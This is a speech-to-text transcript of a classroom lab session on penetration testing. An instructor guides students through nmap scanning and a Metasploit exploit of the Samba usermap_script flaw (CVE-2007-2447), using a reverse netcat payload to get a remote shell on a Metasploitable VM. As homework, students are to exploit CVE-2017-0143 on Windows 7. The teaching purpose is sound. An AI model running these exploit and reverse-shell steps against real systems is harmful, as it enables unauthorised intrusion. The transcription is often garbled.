This conference will now be recorded.
Kartika, Nakshatra, Faraz. Am I audible? Please check. Am I audible? Okay. So, how was your practice for the lab one system hacking? How many of you have done? Did you get the time to complete that lab one? So before I start lab 1, see what is the IP address of these two machines. If I start Kali Linux and as well as White, targeted. So yesterday whatever I have done like 192.168, 1.50 and 51. So that was the IP address for the previous class. Now if I start with a different network and using some different internet, I wanted to see what is the IP address is going to be taking. So username is Kali password. In this case, MSF admin and password also MSF admin. And type IP space address, enter. So this time, this has taken 192.168, 1.109. 192.168, 1.109. This is an IP address exploitable. Again, in our Kali Linux, open your terminal, right click, open terminal here. Type IP space address, and this time this will be 192.168, 1.1. 1.1 is your Kali Linux operating system IP address. Then ping 192.168.1.109. Press enter key. Right now we have a communication between these two machines. So this is our basic requirement. In this entire area of this configuration, let's see what is going to be happen. First understand our Kali Linux machine is having 192.168, 1.1. This IP address. Kali. Then next we have Metasploitable 192.168, 1.109. This is our target IP. This is our attacking mission, and this is our targeted. So yesterday I spoke about Metasploitables framework. So today also we will try to use Metasploitables framework. Okay, so whatever command I am going to listing here, so this has to work under Kali Linux operating system. So use Kali Linux machine and open terminal. Then start writing the command. So when you open the terminal, you will get Kali at the rate of Kali is dollar sign underscore dollar sign, then put greater than. This is the prompt. Okay, so from the same prompt, you try to type the command to open MSF console. So type as MSF console, then press enter key to open MSF console. So same command you have to type. So once it's open, then prompt automatically will change, saying that MSF6 with greater than sign. Okay, and any unwanted text or unwanted screen text if you have, then to clear those things, use the command clear it. Then MSF6, then you type yesterday whatever I've given, same command again you start typing just -c, then 2, then you type 192.168.1.109, then you press enter key. So our next command is MSF6, then you type nmap. So use network scanning commands, dollar sign, small letter yes, capital letter yes, then use your targeted IP 192.168.1.9, then you press enter key. So this command is to open list of port numbers. Again MSF6, again you try to use same command nmap space, this time small letter yes and capital letter yes, again small letter yes, capital letter V, then target your port number, target your port number. So without port number you try to use 192.168.1.109, then press enter key. So when you run stealth scan with version scan, uh, you would get CSV, you know, CSV ID, CVE ID. So CVE ID. So inside the CVE ID, so I'm going to take one CVE ID. Like you only you tell me what is it exactly, what the options are you getting. CVE hyphen 2007 hyphen 2447. Okay, so please search in the Google and you tell me what is the search box or what is the informations are you getting. Okay, so according to me, just you use the chat box and after searching in the Google, are you getting the same what I expected the term? Are you getting that or not? That I can tell you. Okay, so I've given the CVE number or CVE ID. Okay, and you check and you tell me in the cvedetails.com or Google itself directly. According to me, what has to be given, that I will tell you. So as you respond, so check out what is the CVE ID number. Now is it okay, ma, Sartika? Okay, I would requested you to search CVE number in your mobile phone itself, even if you don't have operating system or anything. So your mobile phone is enough. You type same CVE number, CVE hyphen 2007 hyphen whatever I've given. You type and you let me know what is the answer are you getting. Chandana, Nakshatra, Saida, Netravati, Udesha, Ashika, Arti, Yukta, Monica. In the screen you have one CVE number. So type same CVE number and let me know what is the answer are you getting in this Google. Or directly open cvedetails.com. Execution vulnerabilities, yes. But what is the name of that Udesha? What you are giving is correct. Okay, so what is the name of that area? Just you post me in the web or chat. So open google.com, type same CVE number or CVE ID and look at this. This is working for Samba. Look at it. Samba command injections vulnerability. So Samba provides file and print services for Windows, Unix, Linux, even Uh, yes, Windows, Linux, and Unix operating system. Okay, so Samba client. Look at this Samba. Okay, here also you have Samba 3.00. Okay, I'm taking the advantages of this vulnerability. Okay, uh, SMDB in Samba 3.0.0 through 3.0, so on so on. So remote attackers to execute that arbitrary commands via shell meta characters. Hope you all understood. So this is an exploit for CVE 2007-2447 vulnerable SMB, and this other complete detailed information you have. So this is how I can take whatever vulnerabilities we have, and we can find that exact the complete information. Hope you all understood. If that understood how to search CVE number information, so type in the chat box and yes. So this time I'm taking, and also I'm making use of this CVE number. So we understood how to search that, but here have to check the MSF console or MSF metasploitable framework, is it available or not. Okay, so then how do I search this? So to search, you're supposed to be in the same command prompt, and you type search and try to use what is the ID you have directly, and you press enter. So yesterday what I have done, that was little bit different compared to this particular module. Okay, or uh, lab 2. So this time I'm going to take whatever output I'm getting here. So it's going to be a display matched modules. So make ensure, and also note, check the ranking status. If the ranking status is that excellent, then only I can go for excellent. This is our basic requirement. Is it clear? Now, again you start MSF6 and use what is the vulnerability you have. So according to me, so I supposed to get a Samba. Okay. So now we'll try to execute the practical things. Am I able to get this area? What is the exploit? What is the name of the exploit is going to be displayed for this CVID or not? CVID that we will check in the practical way. I'm just sharing the screen. So in this case, whatever we have, the uh, metasploitable. So type MSF console and press enter key. Now it is started. So MSF console, and saying that access security permission denied and stated with MSF 6 same prompt, and you clear all. Then try to use the same command ping space hyphen c and 2 192.168.1.109. Press enter key. I have a 2 times replay. Next again text clear. Type nmap space hyphen s small letter s, then capital letter S. Then this time going to take this same IP with space 192.168.1.109 and press enter key. Okay, asking for root privileges sudo nmap small letter s capital letter S. This would be 192.168.1.109. Press enter. Type 1. These are the list of port numbers I'm having, but this time I will focus towards port number. Okay, so directly I will be searching for the CVA ID number. Okay, and one more, I will try to take that versions sudo nmap hyphen s small letter s capital letter S hyphen s small letter capital letter V space 192.168.1.109. Press enter key. You can see all the versions here. This list of versions, as I said, Samba SMDB, then again Samba SMDB, this is what I would like to target. But this time I'm not taking the advantages of the port number. So instead of that, I use search PVE hyphen 2007 hyphen 2447 and you press enter key, and you can see what is the strict information you have. Is the ranking status what you have. The status is excellent now. Okay, and username maps the script command executions, and this is the complete information what you have. Okay, one more time we run search PVE hyphen 2007 hyphen 2447 press enter key. Look at this is the name of the exploit and the disclosure date, then ranking status, okay, then descriptions, and Here you can use this. So use whatever exploit you have here. Okay, take the advantages of this area. Type use and press enter key. Look at this. I'm inside this exploit. So this is going to be displaying whatever the payload you have, and I'm making use of this exploit. Okay, so you have to use itself. Use is a command. When you type command, then which is allow you to do this. So this is the basic requirement. So if that understood, you type as yes up to this much. How to scan, how to gather the information, then how to get into the command prompt, and how to make use of those things. And finally, we'll try to make use of that exploit and as well as payload. Then we have to set R host and L host. But yesterday's was completely different and today's is completely different. So still I'm taking and making use of the vulnerability. So I am not creating any extra uh, what is that viruses, malware, so on and so on. So inside that area itself we have a list of vulnerabilities. Based on that, I'm trying to hacking the machine. So once search CVE ID if you entered, and name of the exploit is going to be displayed, and use the command use itself, and do copy paste whatever I've shown you earlier. Okay, use this exploit, then slash multi slash samba slash user map underscore script. So then you press enter key, which will take you to the next line. And again in the same prompt, as you have entered here, you have seen what is the output will be exploit. Inside this multi, you have a samba. Again, you have a users map script. Close the bracket, greater than. So this is the output you will be getting. So this is the prompt. So inside this prompt, you have to start now. So what I have to type according to us, you have to type show options. Type show options and press enter. Check once what I'm using is everything is correct or not. Show options, again MSF6, and use again exploit, same prompt samba slash user map script, close the bracket, space. Now what you have to execute is you have to set RO. So set RO, then what was the IP? IP will be 192.168.1.109. This is a remote host IP address. Then you press enter key, type MSF6, again start writing exploit multi amba user map script, close bracket, show payload, not payload, it is payloads. Okay, then press enter key. So when you use this payload, the list of payloads will be displayed. Displaying list of payloads. Once the list of payload is displayed, again start writing in the same console exploit open bracket multi sambar slash user map script. The same prompt, you start writing set payload. You have to use set payload. Then what is the name of the payload? The name of the payload is like cmd command slash unix slash reverse netcat. So previously it was displayed. What is the exploit name? Okay. So you take the same thing, netcat, and press enter. So once it is done, again type MSF6, then inside this area we have to set again lhost exploit open bracket multi slash samba, prompt is never change, script, close the bracket. So here you type set space lhost. Okay, this time earlier you have used rhost. Okay, lhost is our IP address of the colleague 1111. So you have to remember that 192.168.1.111. Okay, then press enter key, and in the same prompt I have to use L port also. So last time I did not use L port, so L port automatically it was been configured. Okay, so use this L port number quad 4. So 4 times you type 44444. Is that clear? If everything is ready, so only one command is left. MSF X exploit multi amba user map script close bracket greater than sign last one X, and press enter key. You know what is the answer you can expect from this? The moment if you type exploit, display the command shell session opened. You have to observe that command shell session is opened. Then again you start like host name, pwd, so on. So whatever command you want, you start writing. Is it clear now? The script area, is that understood? So you please tell me, is it clear? Then I can proceed with practical. So this is the same script where I've left it, where I've left in the last previous session. Okay. So type clear. Hope you remember this. What I've done. Okay. So you have this a complete prompt. Inside this prompt, you have a option. So I wanted to see which are the options are available. So what I'm going to type, show options, and press enter. And look at this. Already some of the command lhost command lhost is already been configured. Then lport is also been configured. Okay, and rhost is not configured here. That we have to check. Okay, and if you want some more information, that you can make use of this. So in place of this area, so type set rhost, because rhost is still is empty. Look at this, rhost is empty. Current settings is nothing is there. So you type rhost and 192.168.1.109. Am I correct? And press enter. If that been configured, then you check for show payloads. Not payload, it is a payloads. And this is going to be display the list of payloads what you have. You can see a lot of things you have. So which one I gave last time? Payload. Payload. Command Unix reverse. Command Unix reverse. So command Unix we have, but reverse is not there. And again scroll down. Check command Unix reverse. Yes, I'm getting here. Could you see this? The payload is command Unix reverse. See this? Set payload. Now I have to use command set space payload, not payloads. Okay, you have to use only payload. Payload, then cmd space cmd slash, what was that, the line. Okay, the same thing to copy paste. Right click, copy, scroll down, right click and paste. Paste and press enter. Set payloads, uh, cmd slash unix slash reverse. Press enter. So now this is obtained. Okay, it is actually payload. So this has been configured. So you have to use only set payload. So once it is done, right, show options again. Look at this lhost. Okay, so lhost is already configured. Sometimes if that's not configured, what you have to do? You have to write set lhost space name of the Kali operating system 192.168.1.111. So this is your Kali operating system and press enter key. Okay, then one more has to be configured, the port number. So here port number is already been configured. So even if not done, so type L port 1, 2, 3, 4. So quad 4 and press enter key. Now this is also been configured. So now most of the 99.99% everything is correct, but only means only one particular percentage is not being done. So means we have to execute. So am I able to get successful shell command or not? That we have to check by using the command called as exploit. Okay, press enter key and wait for a while. Yeah, I got it. Command shell session open. I have a control. So this is my Kali and this is my Metasploit. How do I understand? You type host name and press enter key. So yeah, exactly like Metasploitable. And you type pwd, press enter key. And even you can type IP space address, enter, and that I can see what is the machine I am in. Okay, so like this, even you can create a directory also, and you type ls and what is the list of directories you have in this operating system. That's also available here. Okay, and type clear and pwd. So you are in root actually. If you want to create mk, dir, so on, so on. So Right now not required. So what I will do, I'll run power off. So when you run power off, check out that other side machine is going to be shutting down or not. Now system is shutting down. Metasploitable is shutting down. This is the lab. So if that understood, you type as yes. Lab 2. How many of you understood? You type as yes. Even if not done, also no problem. Not understand, also no problem. I can explain one more time. Traders say yes. So Desha yes. Okay. What about Netravati, Rida, Ashika, Gupta, Arti says yes. Chandana, Aditya. Now what I will do is I'll give you the same script in the WhatsApp. Uh, Use your Kali Linux machine and Metasploitable machine. Will you be getting the same result or not? You check and you tell me once. Okay, this is practical 2. So check your WhatsApp. I will give 15 minutes of time, even not much required, more than 15 minutes. Uh, Connect these two machines under same network and start using this script. So line by line, and are you getting the same result or not, you check and share me the experience and also the output. So make it fast. I'm giving you 15 minutes of time. I've shared in the WhatsApp. Vijesha, 1 minute. Share your screen now. What is the issue? I will check and tell you. Open VMware. Close your WhatsApp and open VMware. Click OK. Okay, power on once again. Click OK. So this power is failed. So do right click here, edit this, edit virtual machine settings. There is the option second one. So select hard disk, click OK. Okay, close the window and remove from this list. In the left hand side, Metasploit you have no right click and remove from this. Go right click, remove. Okay, remove it. Next you go to file new, custom music. Select custom, click next, click next, select Linux, click next. Okay, name the okay, let it be. Click next, next, next. Select host only. So click next, next, next. I use an existing virtual hard disk. Click next. Browse your file. Browse the file. Metasploitable. Double click. Click next. Keep existing format. Click finish. Done. Now you power on. Say OK. Say yes. Change your network later.
Okay.
Once it is restarted, power off. Change the network according to your colleague and bring that two machines under the same network and start writing and execute the commands.
Okay, sir.
You know how to bring them into same network, right?
Yeah, edit the settings, right?
Yeah.
Do I have to type something?
Type MSF admin. Click inside, use your mouse cursor, click inside, and then you type MSF admin. Type same
Pass.
password, same MSF admin. Cursor won't move. Just you simply you type yourself and press enter. You type same MSF admin itself.
Yeah, I'm typing, it's not coming.
That won't give any response now. You assume yourself check the keystrokes. Are you typing exactly that MSF admin in the password area? And you press enter key, that will take you to the next prompt. That's all. Okay, right.
Yeah.
So now move your mouse cursor and turn off your Metasploit. Align that into same network and execute the system hacking lab number 2. Okay.
Okay, sir.
It's host only. It's correct.
Hmm. Okay, so it's the same.
Okay, side. Okay, super. And execute that command, Linux command, and you come to know that you are like hacking, like how I have done, like power off, creating directory, taking the list of commands, say commanding area. Nice job, good. Super. Whether you try that yesterday's one also. Even you have same script in the WhatsApp group. So I'm expecting you to perform how Saida has done, like Netra, Rida, Ashika, Arti, Yukta, Aditya, Faraz, Chandana, etc. So you try to execute what she has done and try to post the same result so that I can understand you have done with the practical, you understood how this is to be hacked by making use of the vulnerability. So how many of you are trying? Jesha, what is the result, ma'am? And Ravida, Netra, Ashika, Arti. So participate in this. At least you gain the knowledge. Super, super. Well attended. Good, good. Type IP space address, ma'am. Jesha. IP space address. So just like this, you type IP space address and press enter key, and whatever you are getting in this Ethernet 0, this would be the IP address of your card. Maybe you will be having exam on 3rd, it seems. We'll see. Because today is 29th, there's only 3 classes left over on 1st, 2nd, 3rd. So you can expect on Wednesday between 6:30 to 7:30, you will be having exam. Monday and Tuesday, same. usual class. So next class, before I start the session, I will share you the feedback form. So everyone try to give a feedback. So how was your practical training and that thing. So I'm marking your attendance. Confirm your names and Chandana, present, then Kartika, not this one, then Nakshatra, present, Faraj, Faraj, last class you not attended, okay, then Saida, then Nedravati, then Jason, Ashika, suppose if you have a Windows operating system, I will open Google, type the CVE number 2017-0143, enter enter key. Okay, you can make use of this vulnerability for most of the Windows operating system. Okay, and try to exploit and execute and share me the screenshot. Windows 7. Look at this. This most of the times you'll get Windows Windows 7. This is the description of what you have. There's a solution also they have given. Like Windows 8, Windows 7, Service Pack 1, Windows 8.1, Windows Server 2012, even Windows 10 Gold. Okay, if they have this uh, CVE number with Windows operating system, which will leads you to take advantages of your vulnerability. Is that clear? So here we have a CVSS score rating also. The severity is going to be 9. You can make use of this advantages also. Okay, so better you search in the Google, you type Windows 7 SP1 ISO file, download it. So this would available. You can click ISO image file. It started downloading now. That you can see. So last class Windows 10, how we can install Windows 10. The same steps you follow and try to install Windows 7 and make use of this CVE number and try to hack this machine. So this is also possible. This is an assignment part. You try to execute it and you let me know this what is the status of this. Okay. Hope you guys is that understood now? So type in the chat box if that understood whatever I said. Make use of Windows 7 operating system service pack 1 and try to hack this. Okay. You ask me if you have any doubts before we wind up this class. Okay. So practice and update me in the WhatsApp So see you all. Take care. Then we'll meet up in the next class. See you all.